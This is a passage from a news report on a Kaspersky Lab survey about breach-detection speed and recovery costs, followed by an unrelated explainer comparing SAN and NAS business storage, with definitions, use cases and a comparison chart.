Kaspersky Lab said that while it was good that more than two-thirds (72%) of the organisations said they had found out about a breach in eight hours or less, that left a “shocking” 25% of businesses which failed to take action during the first hours after the attack because they did not realise they had been breached until later.

As previous research found, Kaspersky Lab said the detection speed was crucial to lowering the financial impact of an attack. The research found that where breaches were detected immediately, recovery costs were typically around £456,000, compared with £1.2m for enterprises that took more than a week to detect a threat that had entered their perimeter.

David Emm, principal security researcher at Kaspersky Lab UK, said the survey findings indicated that the odds of a business falling victim to costly cyber attacks had increased dramatically. “This should act as a stark warning for business owners and IT decision-makers to strengthen their defences,” he said.

The results of the survey, said Emm, also confirmed another trend that the cyber security industry has been warning about for a while.

“The survey shows that attackers sneak throughout the organisation and sometimes leave few or no traces, making the challenge for investigators increasingly difficult, as well as underlining the importance of cooperation among cyber security professionals,” he said.


SAN vs NAS: Difference Between Storage Area Network and Network Attached Storage

When you are looking for local storage for business, there are two options: NAS (Network Attached Storage) and SAN (Storage Area Network). Today you will find out whether it is NAS or SAN that fits your needs.

What Is NAS?

Network Attached Storage (NAS) is a device for storing data over the network. It has dedicated hardware and an OS pre-installed by the manufacturer. The main characteristic of the NAS is the number of bays you can insert hard drives into. From the hardware standpoint, you need to be aware of the NAS CPU and RAM.

NAS is a computerized box for hard drives that can be accessed by multiple users or applications over the network.

This is a Synology NAS device

Typical NAS use cases:

  • Data storage
  • File sharing
  • Backup

NAS should be connected to a local network. It then can be accessed by multiple users. It can also be configured as a network share for simpler user access.

Network storage devices do not have pre-installed hard drives – you should choose them.

Typical NAS infrastructure model


What Is SAN?

Storage Area Network (SAN) is an array of disks, which are attached to the server via a special network. In SAN you get access directly to the storage, as if it was your local hard drive. That makes a storage area network fast if configured correctly.

The right SAN infrastructure consists of a dedicated network typically relying on fiber optics, enterprise-grade storage systems, and special connecting hardware. The wrong SAN setup leads to network overload and instability.

SAN is a bunch of disks that act as one storage device over a network.

Typical SAN infrastructure model


The management of the IT infrastructures with SAN requires a knowledge of low-level block protocols and their hardware and software medium, such as FC switches, optical cables, SCSI-powered protocols, etc.

SAN switch with optical Fibre Channel connectors

SAN infrastructure implementation costs are high from a hardware and management perspective.

Typical SAN use cases:

  • High speed server transactions
  • Data mirroring

NAS can also be made faster by using high-end devices, route planning, a dedicated network and overall optimizations. Both storage solutions are often used within one organization. You may have a file server for storing user files and block storage for disaster recovery at the same time.

Conclusion: SAN vs NAS Comparison Chart

Now you are aware of the fundamental differences between SAN and NAS devices and can find your bearings among storage technologies. We have created a comparison chart with the key features of both storage types so you can choose the right one.

SAN | NAS
Block-level access | File-level access
High performance due to the infrastructure nature, commonly faster | High performance can be achieved using the network and software optimization, commonly slower
May be configured in a very custom way | Easy to configure a basic data storage use case
Needs changes in the existing network | May be published in a network as it is
Needs separate servers for application or user access | Independent device with server functions
Suitable for any apps | Suitable for latency-tolerant apps
Grants read and write access for multiple users using external manager | Grants read and write access for multiple users out of the box
Costs more due to the infrastructure expenses | Cheaper due to the simplicity of deployment
Durable | Durable
Scalable | Scalable
Effective for big data or performance-crucial business | Can be handy for a business of any size

Should You Choose a NAS or a SAN?

Whereas NAS is an endpoint device, SAN is a network of devices that act as one. A network attached storage device is far simpler and cheaper to buy and maintain. Setting up a storage area network requires knowledge, practice and continuous maintenance. It also costs a lot to build one.

If you need storage for backup or data sharing within small teams – you are better off with a NAS.

If you require high input/output speeds, you have servers and applications that need to communicate with each other – hire a professional to build you a SAN.
